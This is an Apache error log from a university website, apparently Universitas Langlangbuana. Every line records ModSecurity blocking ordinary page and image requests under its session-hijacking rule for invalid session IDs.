[Mon Aug 28 08:21:50.222948 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv2rsCo-f0AAJKjaHwAAAAG"]
[Mon Aug 28 08:21:51.147608 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2r8Co-f0AAJTiniwAAAAE"]
[Mon Aug 28 08:22:19.629076 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv2y8Co-f0AAJTinjIAAAAE"]
[Mon Aug 28 08:22:24.836006 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv20MCo-f0AAJXyN5cAAAAM"]
[Mon Aug 28 08:22:24.910662 2023] [:error] [pid 38065] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv20MCo-f0AAJSxY5gAAAAH"]
[Mon Aug 28 08:22:24.920661 2023] [:error] [pid 38378] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv20MCo-f0AAJXqX3kAAAAF"]
[Mon Aug 28 08:22:24.940406 2023] [:error] [pid 38379] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv20MCo-f0AAJXrIrQAAAAP"]
[Mon Aug 28 08:22:24.990642 2023] [:error] [pid 38388] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv20MCo-f0AAJX0cEYAAAAR"]
[Mon Aug 28 08:22:26.205549 2023] [:error] [pid 38378] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv20sCo-f0AAJXqX3oAAAAF"]
[Mon Aug 28 08:22:27.580080 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv208Co-f0AAJTinjQAAAAE"]
[Mon Aug 28 08:22:29.260482 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv21cCo-f0AAJX1kgkAAAAS"]
[Mon Aug 28 08:22:29.635593 2023] [:error] [pid 38065] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv21cCo-f0AAJSxY5kAAAAH"]
[Mon Aug 28 08:22:41.951425 2023] [:error] [pid 38388] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv24cCo-f0AAJX0cEkAAAAR"]
[Mon Aug 28 08:22:42.080500 2023] [:error] [pid 38149] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv24sCo-f0AAJUFNcMAAAAA"]
[Mon Aug 28 08:22:44.310570 2023] [:error] [pid 38065] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv25MCo-f0AAJSxY5wAAAAH"]
[Mon Aug 28 08:22:44.430522 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv25MCo-f0AAJXyN50AAAAM"]
[Mon Aug 28 08:22:53.570951 2023] [:error] [pid 38338] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv27cCo-f0AAJXCvvUAAAAJ"]
[Mon Aug 28 08:22:56.830755 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv28MCo-f0AAJX1kg0AAAAS"]
[Mon Aug 28 08:22:57.233215 2023] [:error] [pid 38338] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv28cCo-f0AAJXCvvYAAAAJ"]
[Mon Aug 28 08:23:03.265500 2023] [:error] [pid 38059] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv298Co-f0AAJSr24IAAAAO"]
[Mon Aug 28 08:23:08.092165 2023] [:error] [pid 38114] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv2-MCo-f0AAJTinjwAAAAE"]
[Mon Aug 28 08:23:08.255334 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2-MCo-f0AAJXyN6QAAAAM"]
[Mon Aug 28 08:23:09.440255 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv2-cCo-f0AAJX1khAAAAAS"]
[Mon Aug 28 08:23:09.580636 2023] [:error] [pid 38114] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2-cCo-f0AAJTinj0AAAAE"]
[Mon Aug 28 08:23:10.532040 2023] [:error] [pid 38386] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv2-sCo-f0AAJXyN6UAAAAM"]
[Mon Aug 28 08:23:10.775083 2023] [:error] [pid 38059] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2-sCo-f0AAJSr24MAAAAO"]
[Mon Aug 28 08:23:20.570879 2023] [:error] [pid 38059] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv3CMCo-f0AAJSr24UAAAAO"]
[Mon Aug 28 08:23:20.960234 2023] [:error] [pid 38114] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3CMCo-f0AAJTinj8AAAAE"]
[Mon Aug 28 08:23:23.200618 2023] [:error] [pid 38389] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv3C8Co-f0AAJX1khMAAAAS"]
[Mon Aug 28 08:23:23.692655 2023] [:error] [pid 38149] [client 114.122.101.51] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3C8Co-f0AAJUFNcoAAAAA"]
[Mon Aug 28 08:23:41.886390 2023] [:error] [pid 38379] [client 125.166.221.156] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv3HcCo-f0AAJXrIsQAAAAP"]
[Mon Aug 28 08:25:18.050853 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv3fsCo-f0AAJSxY7EAAAAH"]
[Mon Aug 28 08:25:18.061344 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv3fsCo-f0AAJSr25MAAAAO"]
[Mon Aug 28 08:25:18.065750 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv3fsCo-f0AAJWfZOYAAAAI"]
[Mon Aug 28 08:25:18.076633 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJSxY7IAAAAH"]
[Mon Aug 28 08:25:18.082930 2023] [:error] [pid 38338] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv3fsCo-f0AAJXCvwQAAAAJ"]
[Mon Aug 28 08:25:18.091996 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv3fsCo-f0AAJSr25QAAAAO"]
[Mon Aug 28 08:25:18.101685 2023] [:error] [pid 37539] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv3fsCo-f0AAJKjaJ4AAAAG"]
[Mon Aug 28 08:25:18.116724 2023] [:error] [pid 38149] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJUFNdkAAAAA"]
[Mon Aug 28 08:25:18.141039 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv3fsCo-f0AAJSxY7MAAAAH"]
[Mon Aug 28 08:25:18.160109 2023] [:error] [pid 38386] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3fsCo-f0AAJXyN7kAAAAM"]
[Mon Aug 28 08:25:18.177102 2023] [:error] [pid 38389] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv3fsCo-f0AAJX1kh4AAAAS"]
[Mon Aug 28 08:25:18.183215 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv3fsCo-f0AAJSr25UAAAAO"]
[Mon Aug 28 08:25:18.186876 2023] [:error] [pid 38386] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv3fsCo-f0AAJXyN7oAAAAM"]
[Mon Aug 28 08:25:18.199911 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv3fsCo-f0AAJSxY7QAAAAH"]
[Mon Aug 28 08:25:18.203993 2023] [:error] [pid 38338] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv3fsCo-f0AAJXCvwUAAAAJ"]
[Mon Aug 28 08:25:18.211966 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv3fsCo-f0AAJWfZOcAAAAI"]
[Mon Aug 28 08:25:18.228862 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv3fsCo-f0AAJSxY7UAAAAH"]
[Mon Aug 28 08:25:18.235149 2023] [:error] [pid 38338] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv3fsCo-f0AAJXCvwYAAAAJ"]
[Mon Aug 28 08:25:18.239393 2023] [:error] [pid 37539] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv3fsCo-f0AAJKjaJ8AAAAG"]
[Mon Aug 28 08:25:18.254298 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv3fsCo-f0AAJWfZOgAAAAI"]
[Mon Aug 28 08:25:18.261033 2023] [:error] [pid 37539] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv3fsCo-f0AAJKjaKAAAAAG"]
[Mon Aug 28 08:25:18.293415 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv3fsCo-f0AAJSr25YAAAAO"]
[Mon Aug 28 08:25:18.298644 2023] [:error] [pid 38149] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv3fsCo-f0AAJUFNdoAAAAA"]
[Mon Aug 28 08:25:18.303565 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv3fsCo-f0AAJSxY7YAAAAH"]
[Mon Aug 28 08:25:18.453493 2023] [:error] [pid 38114] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv3fsCo-f0AAJTink8AAAAE"]
[Mon Aug 28 08:25:18.462839 2023] [:error] [pid 38059] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3fsCo-f0AAJSr25cAAAAO"]
[Mon Aug 28 08:25:18.463455 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv3fsCo-f0AAJXrIs0AAAAP"]
[Mon Aug 28 08:25:18.472532 2023] [:error] [pid 38303] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv3fsCo-f0AAJWfZOkAAAAI"]
[Mon Aug 28 08:25:18.538586 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv3fsCo-f0AAJXrIs4AAAAP"]
[Mon Aug 28 08:25:18.538809 2023] [:error] [pid 38059] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv3fsCo-f0AAJSr25gAAAAO"]
[Mon Aug 28 08:25:18.538841 2023] [:error] [pid 38338] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJXCvwcAAAAJ"]
[Mon Aug 28 08:25:18.564968 2023] [:error] [pid 38114] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv3fsCo-f0AAJTinlAAAAAE"]
